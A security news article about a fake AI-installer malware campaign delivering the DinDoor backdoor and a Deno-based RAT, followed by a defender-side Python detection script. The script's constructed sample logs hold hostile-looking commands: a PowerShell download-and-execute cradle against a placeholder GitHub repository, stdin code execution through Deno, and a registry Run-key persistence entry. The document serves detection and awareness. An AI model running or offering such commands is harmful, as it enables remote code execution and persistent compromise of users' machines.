
Fake ChatGPT and Claude Installers Drop Deno RAT Malware on GitHub


What the Deno RAT Fake AI Installer Campaign Is

The Deno RAT fake AI installer campaign is a malware operation where attackers publish counterfeit ChatGPT, Claude, and other software installers on trusted developer platforms like GitHub and SourceForge, then trick users into running terminal commands that silently install a remote access Trojan built on the Deno JavaScript runtime for stealthy control, data theft, and surveillance. The downloads pose as installers or plugins for popular tools such as ChatGPT, Claude, AutoTune, Kontakt, Ableton Live, and ZENOLOGY, making them attractive to developers, creators, and power users. Behind the scenes, these fake AI installers deploy a backdoor called DinDoor, which in turn loads a Deno-based RAT that Malwarebytes has tracked as Smokest. Compromised YouTube channels with AI-generated videos funnel traffic to these malicious repositories, giving the campaign reach and credibility among people looking for advanced or unofficial AI tools.


How the Infection Chain Works on GitHub and SourceForge

The attack starts on GitHub or SourceForge, where repositories host detailed instructions telling visitors to open a terminal and paste a command tailored for Windows or macOS. That command downloads either an MSI installer or a PowerShell script from GitHub, which installs Scoop and WinGet and then pulls in the legitimate Deno runtime. Once Deno is present, it is used to fetch and execute the DinDoor backdoor directly from a remote server, with the next stage streamed through standard input and never written to disk. DinDoor adds a registry Run key for persistence, fingerprints the system, and contacts a command-and-control server to download further payloads, including the Deno RAT. According to Malwarebytes, the attackers rotate GitHub accounts and create multiple repositories per account, refreshing lures as old ones are taken down so that the campaign stays live.

What Deno RAT Can Do: From Crypto Theft to Screen Streaming

Once the Deno-based RAT is installed, operators gain wide control over the infected machine. The malware can run arbitrary commands and PowerShell scripts, manipulate files, start or kill processes, and create SOCKS5 proxy tunnels for further abuse. Its stealer module is tuned for cryptocurrency theft, targeting more than 50 browser wallet extensions and 10 standalone wallet applications such as Atomic Wallet, Exodus, Electrum, and ByteCoin. It also harvests data from Chromium-based browsers including Chrome, Brave, Edge, Opera, and Vivaldi, as well as from Telegram, Discord, and Lightcord. One of the most worrying features is its covert surveillance capability: the RAT launches Microsoft Edge in the background, connects to it through the Chrome DevTools Protocol, then injects a WebRTC page to stream screen video over a peer-to-peer connection, hiding the traffic inside a normal browser process.

Why This Is a Supply Chain Attack on Open Platforms

This campaign shows how supply chain attacks can grow inside ecosystems developers trust every day. Instead of compromising official binaries, the attackers assemble a chain of legitimate components (GitHub or SourceForge hosting, Scoop, WinGet, and the Deno runtime) to deliver malicious code. Because each piece looks normal in isolation, many security tools treat the activity as benign. GitHub and SourceForge lend reputational cover, while AI-themed lures such as fake ChatGPT and Claude installers capitalize on current developer interest in advanced AI tools. Malwarebytes notes that the fake software targets creators, AI enthusiasts, gamers, and technical users who often download unofficial tools, cracked software, or community installers. The result is a supply chain attack in which seemingly helpful AI utilities become vehicles for Deno RAT malware, crypto wallet theft, and long-term remote control.

How Developers Can Stay Safe from Fake AI Installers

Developers and power users should treat any installer or script from community repositories as untrusted until proven otherwise. Always obtain ChatGPT, Claude, and other AI tools from official distribution channels, not from random GitHub or SourceForge projects promoted in YouTube comments or video descriptions. Be wary of instructions that ask you to paste long terminal commands, especially ones that install package managers and runtimes as a side effect. Review scripts before running them, confirm that repository owners are legitimate, and check for unexpected network calls or download URLs. Security tooling should monitor command-line activity and browser processes such as Microsoft Edge for unusual behavior, for example hidden WebRTC pages or a browser launched by something other than the user. By verifying authenticity up front, developers can reduce their exposure to fake AI installers and to the Deno RAT supply chain attacks spreading across open-source platforms.
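A defender-side illustration of the chain described in "How the Infection Chain Works" and of the monitoring advice in this section: a small Python script, added here and not part of the original article or of Malwarebytes' research, that runs heuristic rules over constructed process-creation log lines and counts how many distinct stages of the chain appear on one host. The log format (`timestamp|parent|image|command line`) is chosen for the example. Two details are assumptions the article does not state: that the next stage is handed to Deno on standard input via `deno run -`, and that the RAT enables the Chrome DevTools Protocol on Edge with `--remote-debugging-port`. The repository owner, paths and Run key value name in the sample lines are placeholders.

```python
"""Heuristic detection of the fake-installer / Deno RAT chain in process logs.

Any single rule below can fire on legitimate developer activity (people do
install Deno with Scoop and do run Edge with remote debugging). The signal is
several stages appearing together on the same host, so chain_score() counts
distinct stages rather than raw hits.
"""
import re
from dataclasses import dataclass
from typing import Callable, Iterable


@dataclass(frozen=True)
class ProcEvent:
    ts: str
    parent: str    # parent image basename, lower-cased
    image: str     # created image basename, lower-cased
    cmdline: str


def parse_line(line: str) -> ProcEvent:
    """Parse one 'ts|parent|image|cmdline' line; cmdline itself may contain '|'."""
    ts, parent, image, cmdline = line.split("|", 3)
    return ProcEvent(ts, parent.lower(), image.lower(), cmdline)


_GH_HOST = re.compile(r"https?://(raw\.githubusercontent\.com|github\.com)/", re.I)
_CRADLE = re.compile(r"\b(irm|iwr|Invoke-RestMethod|Invoke-WebRequest|DownloadString)\b", re.I)
_IEX = re.compile(r"\b(iex|Invoke-Expression)\b", re.I)
_PKG_DENO = re.compile(r"\b(scoop|winget)\b.*\bdeno\b", re.I)
_RUN_KEY = re.compile(r"\\CurrentVersion\\Run\b", re.I)
_EDGE_DEBUG = re.compile(r"--remote-debugging-port\b", re.I)   # assumption: how CDP is exposed


def powershell_download_cradle(e: ProcEvent) -> bool:
    # Stage 1: the pasted terminal command fetches a script from GitHub and executes it in memory.
    return (e.image in ("powershell.exe", "pwsh.exe")
            and bool(_GH_HOST.search(e.cmdline))
            and bool(_CRADLE.search(e.cmdline))
            and bool(_IEX.search(e.cmdline)))


def package_manager_installs_deno(e: ProcEvent) -> bool:
    # Stage 2: Scoop or WinGet pulls in the legitimate Deno runtime as a side effect.
    return bool(_PKG_DENO.search(e.cmdline))


def deno_executes_remote_or_stdin(e: ProcEvent) -> bool:
    # Stage 3: Deno runs code that never touched disk (stdin '-', assumed) or a remote URL.
    if e.image != "deno.exe":
        return False
    args = e.cmdline.split()
    return "-" in args or bool(re.search(r"https?://", e.cmdline))


def run_key_persistence(e: ProcEvent) -> bool:
    # Stage 4: DinDoor persists through a CurrentVersion\Run key (reg.exe is one way to write it).
    return (e.image == "reg.exe"
            and bool(re.search(r"\badd\b", e.cmdline, re.I))
            and bool(_RUN_KEY.search(e.cmdline)))


def background_edge_devtools(e: ProcEvent) -> bool:
    # Stage 5: Edge started with remote debugging by something other than the user's shell.
    return (e.image == "msedge.exe"
            and bool(_EDGE_DEBUG.search(e.cmdline))
            and e.parent not in ("explorer.exe", "msedge.exe"))


RULES: dict[str, Callable[[ProcEvent], bool]] = {
    "powershell_download_cradle": powershell_download_cradle,
    "package_manager_installs_deno": package_manager_installs_deno,
    "deno_executes_remote_or_stdin": deno_executes_remote_or_stdin,
    "run_key_persistence": run_key_persistence,
    "background_edge_devtools": background_edge_devtools,
}


def detect(lines: Iterable[str]) -> list[tuple[str, str]]:
    """Return (rule_name, timestamp) for every event that trips a rule."""
    hits = []
    for line in lines:
        event = parse_line(line)
        for name, rule in RULES.items():
            if rule(event):
                hits.append((name, event.ts))
    return hits


def chain_score(lines: Iterable[str]) -> int:
    """Number of distinct chain stages observed; 3 or more deserves a look."""
    return len({name for name, _ in detect(lines)})


# Constructed sample telemetry (not real data) modelled on the article's description.
SAMPLE_LOG = [
    '2025-01-01T10:00:01Z|explorer.exe|powershell.exe|powershell -c "irm https://raw.githubusercontent.com/EXAMPLE-OWNER/EXAMPLE-REPO/main/install.ps1 | iex"',
    "2025-01-01T10:00:09Z|powershell.exe|powershell.exe|powershell -File C:\\Users\\dev\\scoop\\apps\\scoop\\current\\bin\\scoop.ps1 install deno",
    "2025-01-01T10:00:40Z|powershell.exe|deno.exe|deno run -A -",
    '2025-01-01T10:00:45Z|deno.exe|reg.exe|reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v PLACEHOLDER /t REG_SZ /d "C:\\Users\\dev\\deno.exe run -A C:\\Users\\dev\\AppData\\Local\\stage.js"',
    "2025-01-01T10:01:30Z|deno.exe|msedge.exe|msedge.exe --headless --remote-debugging-port=9222",
    "2025-01-01T11:00:00Z|explorer.exe|msedge.exe|msedge.exe https://example.com",
]

BENIGN_LOG = [
    "2025-01-01T12:00:00Z|explorer.exe|powershell.exe|powershell -c Get-Process",
    "2025-01-01T12:00:10Z|powershell.exe|deno.exe|deno run -A main.ts",
    "2025-01-01T12:00:20Z|explorer.exe|msedge.exe|msedge.exe https://example.org",
]

if __name__ == "__main__":
    for name, ts in detect(SAMPLE_LOG):
        print(f"{ts}  {name}")
    print("chain stages seen:", chain_score(SAMPLE_LOG), "| benign host:", chain_score(BENIGN_LOG))
```

The rules deliberately key on relationships (Edge whose parent is not the user's shell, `reg.exe` spawned by a runtime) rather than on hashes or repository names, since the article notes the operators rotate accounts and repositories; a new lure changes the URL but not the shape of the chain.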
